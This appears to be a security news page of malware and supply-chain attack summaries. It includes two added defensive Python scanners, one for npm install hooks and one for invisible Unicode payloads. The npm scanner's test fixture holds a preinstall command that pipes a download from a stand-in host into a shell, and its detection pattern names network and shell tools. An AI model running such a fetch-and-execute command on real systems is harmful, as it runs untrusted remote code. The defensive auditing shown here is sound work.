152 Chrome Extensions Caught Harvesting Data, Faking Traffic
Socket researchers expose a coordinated network of 152 Chrome 'live wallpaper' extensions stealing user data and generating fake Google organic search traffic.
Malware
The Malware Desk follows ransomware operations, infostealers, and malware-as-a-service ecosystems, covering toolkits, evasion techniques, and the criminal economics behind them.
Cybercriminals are using TikTok and Instagram Reels videos to distribute Vidar malware through fake software tutorials. One campaign accumulated over 100,000 views promoting 'free Spotify Premium' hacks.
Qilin's affiliate network hit healthcare, manufacturing, and critical infrastructure across nine countries in early June. The gang has now dominated the ransomware landscape for 12 months.
Attackers adopted orphaned AUR packages to push credential-stealing malware with kernel-level rootkit capabilities. Here's what Arch users need to do now.
BlackFog researchers detail OnyxC2 MaaS stealer pricing at $250/month. It targets browsers, crypto wallets, and password managers, delivered via DLL sideloading that evades VirusTotal detection.
Attackers exploited CVE-2026-26980 SQL injection in Ghost CMS to compromise 700+ websites including Harvard and Oxford, deploying ClickFix social engineering malware through fake CAPTCHA prompts.
Self-replicating Miasma malware compromises 73 Microsoft repositories across Azure, Microsoft, and MicrosoftDocs orgs. GitHub disables access as durabletask package gets reinfected.
GoDaddy researchers uncover campaign infecting 2,000 WordPress sites with malware that extracts commands from invisible Unicode characters in Steam Community comments.
Sophos discovers ransomware framework using Claude Opus 4.5 to automate EDR evasion and Active Directory discovery. Toolkit tested 80+ modules against Sophos, CrowdStrike, and Defender.
Unit 42 uncovers FlutterShell backdoor campaign targeting macOS users through Google-verified shell companies. Malware evades detection via WebView architecture and Apple notarization.
Fortinet exposes C0xmo, a modular Gafgyt variant exploiting CVE-2021-27137 in DD-WRT routers to recruit IoT devices for DDoS attacks while killing rival malware.
Sophos discovered a cryptocurrency miner bundled with Hola Browser for Windows. The malware creates a Windows service, adds Defender exclusions, and mines when idle.
New Magecart campaign stores payment card skimmer payloads in Stripe customer metadata, then exfiltrates stolen cards as fake customer records. CSP rules won't help.
New MaaS stealer ships encrypted browser data to attacker infrastructure for decryption, bypassing endpoint detection. Session hijacking with geo-matched proxies defeats MFA.
Malicious codexui-android npm package stole OpenAI refresh tokens from 29K developers. Mobile apps with 60K installs also compromised—revoke credentials now.
Malware-as-a-service infostealer spreads through malicious Minecraft mods promoted on YouTube. Steals browser credentials, crypto wallets, and Discord tokens.
32+ Red Hat Cloud Services npm packages compromised with Mini Shai-Hulud credential-stealing malware. 80K weekly downloads affected—here's what developers need to know.
New macOS infostealer SHub Reaper impersonates Apple, Microsoft, and Google software to steal passwords, crypto wallets, and iCloud data. Bypasses Tahoe 26.4 mitigations.
A fake Sicoob SDK on NuGet exfiltrated PFX certificates and banking credentials from Brazilian developers, while 14 malicious npm packages harvested AWS keys, Vault tokens, and CI/CD secrets.
Sysdig documents the first AI-agent-driven intrusion: attackers exploited Marimo CVE-2026-39987, then used an LLM agent to pivot through AWS and exfiltrate a PostgreSQL database in under an hour.
Daemon Tools, TanStack, and Nx Console all compromised via supply chain attacks. CVSS scores up to 9.5. CISA mandates federal remediation by June 10.
Attackers weaponize CVE-2026-35616 to deploy EKZ infostealer via FortiClient EMS management features. Fake Fortinet patch harvests browser passwords and cookies.
Malicious repository impersonating OpenAI's Privacy Filter reached 244,000 downloads before removal. Infostealer targeted Windows users via trending Hugging Face page.
Microsoft warns of active campaign using AI chatbot recommendations to distribute GPU mining malware. Attackers target high-end graphics card owners through fake utility downloads.
Malicious npm package mouse5212-super-formatter stole files from Claude AI's working directory. The attacker's own GitHub token was exposed in the code, allowing researchers to trace exfiltration.
New ransomware group Payload uses Babuk-derived code to target Windows and VMware ESXi systems. 12 victims across 7 countries within hours of launching leak site.
Supply chain attack deploys 34 malicious packages across npm, PyPI, and Crates.io to steal crypto wallets, SSH keys, and developer credentials. AI assistants weaponized.
Automated Megalodon campaign pushed 5,718 malicious commits to GitHub repos on May 18, injecting CI/CD workflows that exfiltrate cloud credentials, SSH keys, and secrets. SafeDep links it to TeamPCP.
Attackers compromised 700+ versions of Laravel-Lang PHP packages via tag poisoning, deploying a sophisticated stealer targeting cloud credentials, crypto wallets, and browser data. Packagist pulled affected versions.
Leaked Shai-Hulud malware source code fuels new npm supply chain attack. Four malicious packages steal credentials and deploy DDoS bot with TCP/UDP flood capabilities.
Attackers published malicious Nx Console 18.95.0 to VS Code Marketplace, stealing developer credentials via triple-channel exfiltration and Sigstore-signed npm package poisoning.
REMUS, a 64-bit Lumma Stealer successor, now offers session theft, EtherHiding blockchain C2, and full MaaS infrastructure targeting browser credentials and auth tokens.
SHub Reaper macOS infostealer bypasses Tahoe 26.4 defenses using applescript:// URLs, spoofs Apple, Google, and Microsoft to steal credentials and backdoor systems.
Attackers exploit unauthenticated vulnerability in Funnel Builder plugin to inject payment skimmers on 40,000+ WordPress stores. Patch to 3.15.0.3 immediately.
Attackers seized control of node-ipc by re-registering the maintainer's expired email domain. Three malicious versions now harvest AWS, GCP, Azure keys and more.
RubyGems suspended new account registration after attackers uploaded over 500 malicious packages in a coordinated spam attack targeting the Ruby package ecosystem.
Nitrogen ransomware gang claims 8TB of data including Apple, Nvidia, and Intel files from Foxconn's Wisconsin and Texas facilities. Fourth major ransomware incident for the electronics giant.
Hunt.io uncovers xlabs_v1, a Mirai-based botnet exploiting Android Debug Bridge on port 5555 to conscript IoT devices into a DDoS-for-hire service targeting game servers.
Pharma supplier West Pharmaceutical Services discloses ransomware attack in SEC filing. Attackers exfiltrated data before encrypting systems. Unit 42 investigating.
A new TrickMo variant routes Android trojan traffic through The Open Network, making domain takedowns ineffective. The malware adds SSH tunneling and SOCKS5 proxy capabilities for network pivoting.
TeamPCP compromised 84 versions across 42 TanStack packages on May 11 using GitHub Actions cache poisoning. The malware steals CI/CD credentials and includes a wiper that triggers on token revocation.
Five NuGet packages typosquatting popular Chinese .NET libraries have racked up 65,000 downloads while stealing browser credentials, crypto wallets, and SSH keys from developer machines.
Malvertising campaign abuses Google Ads and Claude.ai shared chats to deliver MacSync infostealer. Victims searching for Claude downloads get tricked into running malicious terminal commands.
Attackers exploited a CMS flaw on JDownloader's website to swap download links with trojanized installers. Windows users got a Python RAT; Linux users got root-persisted ELF binaries.
SentinelLABS uncovers PCPJack, a credential-stealing worm that removes TeamPCP infections before harvesting API keys from Docker, Kubernetes, and cloud services. Five CVEs enable worm-like spread.
A typosquatted OpenAI repository on Hugging Face delivered Rust-based infostealer malware to Windows users, racking up 244K downloads before removal.
NWHStealer spreads via fake gaming mods and TradingView scripts, using Bun JavaScript runtime and XOR-encrypted C2 to bypass security tools.
ESET exposes CallPhantom campaign: fraudulent Google Play apps promised call records for any number, delivered hardcoded fake data after payment.
Brazilian banking trojan TCLBanker targets 59 financial platforms using a trojanized Logitech installer. It hijacks WhatsApp Web and Outlook to self-propagate, while WPF overlays facilitate real-time fraud.
Kaspersky uncovered a supply chain attack on DAEMON Tools official website. Trojanized installers deployed QUIC RAT backdoors to thousands of systems, with a dozen government and manufacturing targets receiving advanced payloads.
New infostealer MicroStealer evades major antivirus while stealing browser credentials, crypto wallets, and Discord tokens from US and German organizations.
Three malicious versions of the xinference AI inference library were uploaded to PyPI, targeting cloud credentials and SSH keys from 680K+ users. TeamPCP claims a copycat is responsible.
Attackers compromised elementary-data version 0.23.3 on PyPI, pushing malicious code to 1.1 million monthly users. The infection extended to Docker images via automated workflows.
Securonix uncovers DEEP#DOOR, a Python-based backdoor that steals browser passwords, AWS/Azure credentials, and SSH keys while evading detection through bore.pub tunneling and extensive anti-analysis.
Go-based Sorry ransomware exploits cPanel auth bypass CVE-2026-41940, encrypting files with ChaCha20/RSA-2048. 44,000+ IPs compromised as attackers demand Tox ransom.
Four official SAP CAP ecosystem packages compromised on April 29, harvesting developer credentials, cloud secrets, and CI/CD tokens through malicious preinstall scripts.
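Several items on this page (the SAP CAP, Red Hat, Shai-Hulud and node-ipc entries) come down to the same mechanism: a lifecycle script such as preinstall or postinstall runs arbitrary code the moment `npm install` unpacks the package. The scanner below is an added example for auditing an installed tree for such hooks; it is not code from any of the articles or projects listed. The regex heuristic and the three fixture packages (left-pad-ish, native-thing, evil-formatter) are constructed for illustration, not real packages.

```python
"""Audit a node_modules tree for npm lifecycle scripts that execute at
install time. Added example; the fixture packages are constructed."""
import json
import os
import re
import tempfile

# Hooks npm runs automatically during install (prepare runs for git deps
# and local installs). A stealer only needs one of these.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# Hypothetical heuristic: install commands that fetch, decode or spawn.
# Legitimate native builds ("node-gyp rebuild") do not match.
SUSPICIOUS = re.compile(
    r"curl|wget|base64|eval\(|child_process|powershell|/dev/tcp", re.I
)


def audit_package_json(path):
    """Return one finding per lifecycle hook declared in this package.json."""
    with open(path, encoding="utf-8") as fh:
        pkg = json.load(fh)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE:
        cmd = scripts.get(hook)
        if cmd:
            findings.append({
                "package": pkg.get("name", "?"),
                "version": pkg.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "suspicious": bool(SUSPICIOUS.search(cmd)),
            })
    return findings


def audit_tree(root):
    """Walk root (e.g. a project's node_modules) and collect all hooks,
    suspicious ones first so they are at the top of any report."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        if "package.json" in filenames:
            findings.extend(
                audit_package_json(os.path.join(dirpath, "package.json")))
    return sorted(findings, key=lambda f: (not f["suspicious"], f["package"]))


def build_fixture():
    """Create a throwaway node_modules with constructed packages:
    one clean, one legitimate native build, one install-time downloader."""
    root = tempfile.mkdtemp(prefix="npm-audit-")
    pkgs = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0",
                         "scripts": {"test": "node test.js"}},
        "native-thing": {"name": "native-thing", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild"}},
        "evil-formatter": {"name": "evil-formatter", "version": "0.0.7",
                           "scripts": {"preinstall": "node -e \"require("
                               "'child_process').exec('curl -s "
                               "http://example.invalid/x | sh')\""}},
    }
    for name, pkg in pkgs.items():
        pkg_dir = os.path.join(root, "node_modules", name)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w",
                  encoding="utf-8") as fh:
            json.dump(pkg, fh)
    return root


if __name__ == "__main__":
    for f in audit_tree(build_fixture()):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"[{flag}] {f['package']}@{f['version']} {f['hook']}: {f['command']}")
```

Run it against a real project with `audit_tree("node_modules")`. The heuristic is a triage aid, not a verdict: treat every hook as code you are about to execute, and prefer `npm ci --ignore-scripts` in CI so that install-time code never runs without an explicit allow-list.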
TeamPCP threat actors backdoored versions 2.6.2 and 2.6.3 of the popular AI framework, harvesting SSH keys, cloud credentials, and GitHub tokens from millions of developers.
Malwarebytes uncovers campaign using fake TradingClaw website to distribute Needle Stealer malware. The infostealer hijacks browsers to harvest credentials, crypto wallets, and financial data from traders.
Socket researchers identify 73 malicious VS Code extensions on Open VSX tied to GlassWorm campaign. Six already activated to deliver malware through native binaries and obfuscated JavaScript.
Attackers use SEO poisoning to push malicious Claude Code installers to developers. The two-stage macOS malware steals credentials, crypto wallets, and establishes persistent backdoor access.
CISA and NCSC warn of Firestarter backdoor persisting on Cisco ASA and Firepower devices. The malware survives firmware updates and requires physical power disconnection to remove.
A malicious npm package hijacked Bitwarden CLI's publishing pipeline on April 22, harvesting credentials from 334 developers. Here's what happened.
Masjesu botnet, marketed via Telegram, exploits 12 vulnerabilities to conscript routers and IoT devices for DDoS attacks. Nearly 50% of traffic originates from Vietnam.
Akamai detects active exploitation of CVE-2025-29635 in discontinued D-Link DIR-823X routers. The tuxnokill variant spreads via command injection and launches DDoS attacks from compromised devices.
New Kyber ransomware operation uses the Kyber1024 post-quantum KEM (the scheme NIST standardized as ML-KEM) in its Windows variant and targets VMware ESXi with a separate variant. Rapid7 analysis reveals the ESXi version's claims are false.
Attackers are distributing PlugX malware through phishing campaigns impersonating Anthropic's Claude AI. The fake installer abuses a legitimate G DATA binary for DLL sideloading.
Kaspersky exposes Lotus, a data wiper deployed against Venezuela's energy utilities in December 2025. The malware destroys recovery mechanisms and leaves systems unrecoverable.
Threat actors pose as VCs on LinkedIn, share weaponized Obsidian vaults that silently deploy an AI-generated backdoor using blockchain C2 infrastructure.
New ransomware operation claims Medical Park Hospitals as first victim. 36 Turkish hospitals face data leak threats after 3.3TB exfiltration.
New ransomware operation linked to ex-BlackBasta affiliates runs Alpine Linux VMs on compromised hosts. Endpoint tools can't see inside the VM boundary.
Darktrace researchers expose ZionSiphon, OT malware designed to sabotage chlorine levels and pressure controls at Israeli desalination plants. A coding error currently prevents activation.
Multiple campaigns distribute NWHStealer infostealer through counterfeit Proton VPN installers, gaming modifications, and YouTube-promoted downloads. Targets browser data and 25+ crypto wallets.
Security researchers expose 108 malicious Chrome extensions operating under five fake publishers, stealing Google OAuth tokens, Telegram sessions, and injecting ads. Over 20,000 users affected.
eSentire researchers expose Omnistealer, a North Korean infostealer storing payloads in blockchain transactions. 300,000 credentials compromised across government and defense sectors.
ClickFix attackers bypass macOS 26.4 Terminal paste scanning by using applescript:// URLs to launch Script Editor. Same payload, new delivery vector.
Ransomware attack on ChipSoft forces 11 Dutch hospitals offline. The vendor manages patient records for most of the Netherlands. Attacker unknown.
Attackers compromised CPUID's website API for six hours, redirecting CPU-Z and HWMonitor downloads to trojanized installers that steal browser credentials using advanced evasion techniques.
Russian GRU's APT28 uses new PRISMEX malware suite with steganography and COM hijacking to target Ukraine defense and NATO logistics. Includes wiper capability.
Attackers compromised Nextend's update infrastructure to push a malicious Smart Slider 3 Pro version with four layers of backdoors. Here's who's affected and how to recover.
Contagious Interview campaign escalates with trojanized developer tools across five ecosystems. Packages impersonate logging utilities and steal credentials.
Over 1,000 exposed ComfyUI instances targeted by cryptomining campaign. Attackers exploit custom nodes for RCE, deploy XMRig and Hysteria V2 botnet with persistence.
Coordinated npm supply chain attack deploys 36 malicious packages masquerading as Strapi CMS plugins. Attackers target cryptocurrency platforms with Redis exploitation, credential harvesting, and persistent backdoors.
Brazilian threat actor Augmented Marauder targets Latin America and Europe with Casbaneiro banking trojan, using dynamically generated court summons PDFs and Horabot for worm-like propagation.
Microsoft Defender Experts identify multi-stage malware campaign using WhatsApp messages to deliver VBS scripts that bypass UAC and establish persistent Windows backdoors.
Security researchers expose KadNap malware targeting ASUS routers to build a criminal proxy network. 60% of infected devices located in the US, linked to Doppelganger service.
Kaspersky discovers new SparkCat malware variants on Apple App Store and Google Play that use OCR to steal cryptocurrency wallet recovery phrases from photo galleries.
Sinobi, a suspected Lynx/INC rebrand, has grown from 40 victims to 215 since September 2025. The RaaS operation targets US midmarket companies with hybrid Curve25519/AES encryption.
Threat actors weaponized Anthropic's accidental source code leak to distribute Vidar malware through trojanized GitHub repos. Here's how the attack works.
McAfee discovered NoVoice malware hiding in 50+ Google Play apps, using 22 exploits to root devices and clone WhatsApp sessions. Factory reset won't remove it.
New Storm infostealer bypasses Chrome's App-Bound Encryption by shipping encrypted credentials to attacker infrastructure for decryption. Endpoint tools can't detect it.
Kaspersky exposes CrystalX RAT, a new malware-as-a-service combining stealer, RAT, and prankware. It rotates screens, swaps mouse buttons, and drains crypto via clipboard hijacking.
New DeepLoad malware combines ClickFix delivery with AI-generated obfuscation to bypass security scanners. WMI persistence survives remediation for days.
Russian-linked AuraStealer infostealer operates 48 C2 domains, steals crypto wallets and 2FA tokens, and spreads through fake software activation videos on TikTok.
Attackers compromised the Axios npm package to deploy a cross-platform RAT targeting Windows, macOS, and Linux. Here's what happened and what you need to do.
TeamPCP compromised the popular telnyx Python SDK on PyPI, hiding credential-stealing malware inside WAV audio files. Versions 4.87.1 and 4.87.2 affected—downgrade immediately.
Malwarebytes researchers detected a Vidar infostealer campaign using fake CAPTCHA pages on compromised WordPress sites. ClickFix technique tricks users into running malicious PowerShell.
Attackers are posting thousands of fake Visual Studio Code vulnerability alerts in GitHub Discussions, using fabricated CVEs and urgent language to trick developers into downloading malware.
A new macOS infostealer combines ClickFix social engineering with Nuitka-compiled Python to evade detection. First documented campaign pairing these techniques.
A new payment skimmer uses WebRTC data channels instead of HTTP to exfiltrate stolen card data, bypassing Content Security Policy controls on Magento stores.
Fake copyright infringement notices target healthcare and government organizations in Germany and Canada with fileless PureLog Stealer malware. Campaign uses language-matched lures.
New Torg Grabber infostealer targets 728 cryptocurrency wallet extensions and 103 password managers. Spreads via ClickFix clipboard hijacking with Cloudflare-based exfiltration.
Stolen CI credentials from the Trivy breach enabled TeamPCP to compromise Checkmarx KICS GitHub Actions, poisoning all 35 version tags with credential-stealing malware in a four-hour window.
Malicious LiteLLM versions 1.82.7 and 1.82.8 deployed credential harvester, Kubernetes lateral movement tools, and persistent backdoor. Package sees 3 million daily downloads.
TeamPCP's supply chain attack expands with a Kubernetes wiper that detects Iranian systems via timezone and locale, wiping clusters while backdooring everyone else.
VoidStealer v2.0 becomes the first infostealer to extract Chrome's v20_master_key using hardware breakpoints. No injection or privilege escalation required.
TeamPCP threat actors hijacked Aqua Security's Trivy vulnerability scanner, compromising 75 GitHub Action tags and spreading credential-stealing malware to 47 npm packages via blockchain C2.
New infostealer parasitizes legitimate document security software, exfiltrating data through trusted server infrastructure. Targets include Dongfeng-27 ballistic missile documents.
GlassWorm campaign expands across Open VSX, npm, and GitHub with invisible Unicode payloads and Solana-based C2. Developers urged to audit dependencies immediately.
Multiple threat actors deploy DarkSword, a six-CVE iOS exploit chain stealing crypto wallets, credentials, and messages from millions of vulnerable iPhones.
Interlock ransomware operators weaponized Cisco Secure Firewall Management Center CVE-2026-20131 as a zero-day since January 26, gaining root access to enterprise networks.
LeakNet ransomware now uses ClickFix social engineering via hacked websites and a Deno-based in-memory loader to evade detection. Here's how the attack chain works.
Iran-linked hackers wiped tens of thousands of Stryker devices using Microsoft Intune's remote wipe feature. Here's what security teams should learn.
Three ClickFix campaigns target macOS users with MacSync infostealer disguised as ChatGPT and AI coding tools. Latest variant adds in-memory execution to evade detection.
Global campaign hijacks WordPress sites in 12 countries to serve fake Cloudflare CAPTCHAs that deploy Vidar, VodkaStealer, and other credential theft malware.
Russian-linked AuraStealer infostealer uses TikTok videos and 48 C2 domains to steal credentials. ABE bypass defeats Chrome's cookie encryption.
Storm-1811 actors flood inboxes with spam, then call via Microsoft Teams posing as IT support. Quick Assist grants access for A0Backdoor deployment.
GlassWorm supply chain attack spreads via 72 Open VSX extensions using invisible Unicode obfuscation. Targets crypto wallets, API tokens, and CI/CD pipelines.
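The GlassWorm entries above, like the WordPress/Steam campaign earlier on this page, rely on code points that render as nothing in an editor or diff view. The scanner below is an added example of the check a reviewer can run over source or extension files before trusting them; it is not code from the articles or from any of the projects named. The byte-to-variation-selector encoding it decodes (U+FE00..FE0F for values 0-15, U+E0100..E01EF for 16-255) is an assumed illustrative scheme, and the JavaScript sample is constructed.

```python
"""Find and decode invisible Unicode in source text. Added example; the
encoding scheme and sample are assumptions for illustration."""
import unicodedata

# Ranges that render as blank or zero-width in most editors. Variation
# selectors are category Mn, so a category-only check would miss them.
INVISIBLE_RANGES = (
    (0x200B, 0x200F),    # zero-width space/non-joiner/joiner, LRM, RLM
    (0x2060, 0x2064),    # word joiner, invisible operators
    (0xFE00, 0xFE0F),    # variation selectors
    (0xE0100, 0xE01EF),  # variation selectors supplement
    (0xE0000, 0xE007F),  # tag characters
    (0x115F, 0x1160),    # Hangul fillers (render blank)
    (0x3164, 0x3164),    # Hangul filler
)


def is_invisible(ch):
    cp = ord(ch)
    if any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES):
        return True
    # Cf = other format chars (BOM, soft hyphen); Co/Cn = private use or
    # unassigned, which have no business in a JavaScript file.
    return unicodedata.category(ch) in ("Cf", "Co", "Cn")


def scan_source(text):
    """Return (line, col, 'U+XXXX', name) for every invisible code point."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if is_invisible(ch):
                hits.append((line_no, col, f"U+{ord(ch):04X}",
                             unicodedata.name(ch, "<unnamed>")))
    return hits


def encode_vs(data):
    """Assumed scheme: one variation selector per byte."""
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16)
                   for b in data)


def decode_vs(run):
    """Inverse of encode_vs; non-selector characters are ignored."""
    out = bytearray()
    for ch in run:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)
    return bytes(out)


def extract_hidden_runs(text):
    """Decode every maximal run of variation selectors in the text."""
    runs, current = [], []
    for ch in text:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F or 0xE0100 <= cp <= 0xE01EF:
            current.append(ch)
        elif current:
            runs.append(decode_vs("".join(current)))
            current = []
    if current:
        runs.append(decode_vs("".join(current)))
    return runs


# Constructed sample: a zero-width space inside a function body and a
# string literal carrying two hidden bytes ("hi") as variation selectors.
SAMPLE_JS = (
    "const a = 1;\n"
    "function f() {\u200B return a; }\n"
    'const payload = "' + encode_vs(b"hi") + '";\n'
)

if __name__ == "__main__":
    for hit in scan_source(SAMPLE_JS):
        print("invisible code point at line %d col %d: %s %s" % hit)
    print("hidden runs:", extract_hidden_runs(SAMPLE_JS))
```

In practice, run `scan_source` over every `.js`/`.ts` file in an extension or package and fail the review on any hit; legitimate source code has essentially no use for format characters or variation selectors, so the false-positive rate is close to zero and a single hit is worth a manual look.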
Attackers compromised AppsFlyer's domain registrar to inject crypto-stealing JavaScript into their Web SDK. The malware swaps wallet addresses for Bitcoin, Ethereum, Solana, and more.
IBM X-Force discovers Hive0163 using LLM-generated Slopoly malware in Interlock ransomware attacks, marking a shift in how threat actors weaponize AI to accelerate malware development.
New Android trojan BeatBanker mines Monero while stealing banking credentials. Spreads via fake Starlink and government apps in Brazil.
New infostealer MicroStealer uses NSIS, Electron, and Java in a layered delivery chain that bypasses most security tools. Targets browser credentials and crypto wallets.
Researchers discovered five packages on crates.io masquerading as time utilities while exfiltrating developer credentials and API keys to attacker infrastructure.
New KadNap botnet targets Asus routers using peer-to-peer Kademlia protocol for stealth C2. Over 60% of infections in the US, linked to Faceless proxy service.
Ransomware affiliate Velvet Tempest uses ClickFix social engineering to deploy DonutLoader and CastleRAT in 12-day intrusion linked to Termite ransomware staging.
Multi-stage malware campaign uses Python loaders and Early Bird APC injection to deploy encrypted RATs. TryCloudflare tunnels mask C2 infrastructure.
A dormant JavaScript worm activated during a security review vandalized 4,000 Wikipedia pages in 23 minutes. Here's what happened and why it matters.
A dormant JavaScript worm activated during a Wikimedia security review modified 4,000 pages and infected 85 user scripts in 23 minutes before containment.
Malicious GitHub repositories exploit Bing AI search results to distribute infostealers and GhostSocks proxy malware. Fake OpenClaw installers turn victims into residential proxies.
Supply chain attack targets PHP developers via fake Laravel utilities containing encrypted RAT payload. The malware gains full access to database credentials and API keys.
Russian-speaking developers behind AuraStealer infostealer scale infrastructure to 48 command-and-control domains, targeting 110+ browsers and 250+ extensions.
Security researchers uncover 26 malicious npm packages using steganography to hide command infrastructure in computer science essays. Famous Chollima cluster targets developers with RAT.
Updated CISA analysis reveals RESURGE implant uses advanced evasion techniques and can persist undetected on Ivanti Connect Secure devices until remote activation.
Malicious QuickLens browser add-on combines Google Lens functionality with ClickFix social engineering to drain cryptocurrency wallets through fake CAPTCHA prompts.
Trend Micro finds 2,200+ malicious skills weaponizing AI agents to deploy AMOS. The campaign marks a shift from prompt injection to using AI as a trusted intermediary for malware delivery.
New botnet loader stores encrypted commands in smart contracts on Polygon, making traditional infrastructure takedowns ineffective. Operating costs are under $1 for 100+ commands.
ReversingLabs caught StripeApi.Net typosquatting the official Stripe library. The package processed payments normally while exfiltrating API keys in the background.
Cisco Talos uncovers UAT-10027 deploying Dohdoor malware against American hospitals and schools. The backdoor uses DNS-over-HTTPS to evade detection.
Microsoft uncovers developer-targeting campaign using fake coding assessments to deliver JavaScript backdoors through VS Code automation triggers and Vercel-hosted payloads.
Huntress responds to ClickFix intrusion deploying Matanbuchus 3.0 and custom AstarionRAT. Attackers achieved lateral movement within 40 minutes.
Threat actors bypass ClawHub security by hiding Base64 payloads in fake troubleshooting comments. Atomic Stealer delivered to unsuspecting OpenClaw users.
Kaspersky exposes Arkanix Stealer, a Python and C++ infostealer likely built with LLM assistance. After two months of targeting crypto wallets and VPNs, the operation vanished.
Banking trojan disguised as IPTV streaming apps targets users in Portugal and Greece, enabling device takeover and credential theft through overlay attacks.
ESET discovers PromptSpy, the first Android malware weaponizing Google's Gemini AI to maintain persistence by analyzing UI and generating real-time tap instructions to stay pinned in recent apps.
Elastic Security Labs uncovers ClickFix campaign abusing compromised bincheck.io to deliver MIMICRAT, a custom C++ RAT with SOCKS5 tunneling and token impersonation capabilities.
SANS ISC analyzes DynoWiper's internals revealing Mersenne Twister seeding, 16-byte overwrite buffers, and directory exclusions. Technical breakdown of Sandworm's latest wiper.
Microsoft warns of ClickFix variant using nslookup commands to stage malware via DNS traffic. Delivers ModeloRAT through fileless attack chain.
Microsoft Defender Experts track expanding infostealer campaigns hitting macOS via ClickFix prompts, malicious DMG installers, and Python-based stealers. DigitStealer, MacSync, and AMOS lead the wave.
Cloud-native worm campaign by TeamPCP has compromised 60,000+ servers by exploiting Docker APIs, Kubernetes, and React2Shell. Flare researchers detail the industrialized operation.
Xavier Mertens discovers 846 images reusing the same Base64 steganography technique to deliver .NET malware via Equation Editor exploits. Here's how defenders can hunt for copycats.
Hudson Rock detects Vidar infostealer exfiltrating OpenClaw AI agent files for the first time. Stolen configs include gateway tokens and cryptographic keys.
CTM360 exposes 4,000+ malicious Google Groups delivering Lumma Stealer and Ninja Browser malware. Attackers pose as tech support in forums to bypass network detection.
Microsoft warns of ClickFix variant that deliberately crashes Chrome, then social-engineers victims into running PowerShell. Only domain-joined hosts targeted.
Researchers expose three Chrome extension campaigns stealing Meta Business Suite exports, VK accounts, and AI chatbot conversations from over 760,000 users.
New Linux botnet SSHStalker infected 7,000 cloud servers using brute-force SSH attacks and 2009-era kernel exploits. Uses IRC for command-and-control while apparently staging for future operations.
New ransomware family Reynolds embeds a vulnerable NsecSoft driver directly into its payload to disable CrowdStrike, Sophos, and other EDR tools before encryption begins.
Commercial mobile spyware on Telegram offers live surveillance, OTP interception, and crypto theft across Android 5-16 and iOS up to version 26.
BridgePay confirms ransomware attack crippled its payment processing platform, forcing merchants nationwide to cash-only. FBI and Secret Service are investigating.
Conpet, operator of 3,800km of Romanian oil pipelines, confirms cyberattack. Qilin claims 1TB of stolen data including financial records and passports.
Sophos finds 7,000+ servers with identical hostnames from ISPsystem VMmanager templates. LockBit, Qilin, and Conti all used the same bulletproof hosting VMs.
Rapid7 attributes the six-month Notepad++ supply chain compromise to Chinese APT Lotus Blossom, revealing a custom Chrysalis backdoor and three distinct infection chains.
Over 1,000 IPs exploit CVE-2025-55182 to inject malicious NGINX configs that redirect web traffic through attacker infrastructure, targeting Asian government and education sites.
Securonix uncovers multi-stage fileless campaign using IPFS-hosted VHD files and process injection into signed Windows binaries to deploy AsyncRAT.
SANS researcher uncovers multi-stage malware attack hiding XWorm payload inside a legitimate travel website image using steganography and obfuscated batch scripts.
Flare research finds enterprise identity compromise doubled in 2025, with Microsoft Entra ID appearing in 79% of logs. Session cookies enable MFA bypass at scale.
Russian-linked gang dumps executive emails, employee IDs, and banking communications in first airline sector attack of 2026.
Security researchers uncover ClawHavoc campaign distributing Atomic Stealer through fake cryptocurrency and productivity tools on ClawHub marketplace.
Security researchers expose an active campaign using layered evasion techniques to deliver Remcos RAT through MSBuild abuse and .NET Reactor-protected loaders.
Learn what ransomware is, how attacks work, the main types including double extortion, and practical steps to defend against this growing threat.
New campaign combines fake CAPTCHA pages with signed Microsoft scripts to bypass security tools and install Amatera infostealer on enterprise systems.
Two AI coding assistants on Microsoft's marketplace steal source code and credentials in real-time. Extensions use hidden iframes and analytics SDKs to profile developers.
New ransomware family employs BYOVD technique with POORTRY driver to disable endpoint protection. Evidence links operators to Inc ransomware campaigns.
The NexShield Chrome extension impersonated uBlock Origin's developer and used ClickFix techniques to deliver ModeloRAT malware to corporate networks.
Resecurity uncovers stealthy DLL-sideloading malware with APT-grade anti-VM tricks. Multiple ransomware groups now deploying it.
Budget Android TV boxes and tablets ship with backdoors from the factory, turning home networks into criminal infrastructure for ad fraud and proxy services.
Sophos exposes malvertising campaign that stayed dormant for 56 days before activating credential theft across 50+ fraudulent domains.
New Boto Cor-de-Rosa campaign uses Python-based worm module to auto-send malware through victims' WhatsApp contacts.
Cybercrime group uses fake software downloads and malicious Bing ads to deploy infostealer malware at scale across Chinese systems.
Multi-stage malware campaign uses text-based stagers and living-off-the-land binaries to deliver Remcos RAT to enterprise targets.
Five malicious extensions masquerading as HR tools steal authentication tokens, block security panels, and enable account takeover through cookie injection.
CyberArk exploited a vulnerability in the StealC infostealer's control panel to identify threat actors, steal session cookies, and track an operator who compromised 5,000 victims.
The initial access malware now delivers payloads through deliberately malformed archives that crash security tools while executing normally on Windows.
Check Point researchers expose a sophisticated cloud-native malware framework designed from the ground up to target AWS, Azure, GCP, and containerized environments.
A ransomware operation has compromised multiple US educational institutions using stolen VPN credentials. The education sector represents 80% of known victims.
A new ransomware group has compromised at least six healthcare organizations in Taiwan using BYOVD attacks to disable security software before encryption.
Two rogue browser extensions masquerading as AI tools exfiltrated complete conversation histories from ChatGPT and DeepSeek to attacker-controlled servers every 30 minutes.
A threat actor called RedTeam is selling a $1,500 credential-stuffing tool with built-in scanning, proxy rotation, and multi-protocol support aimed at enterprise VPN infrastructure.
The Russian-linked gang led all ransomware groups on January 6 with attacks spanning wine distributors, art logistics, and medical practices across three countries.
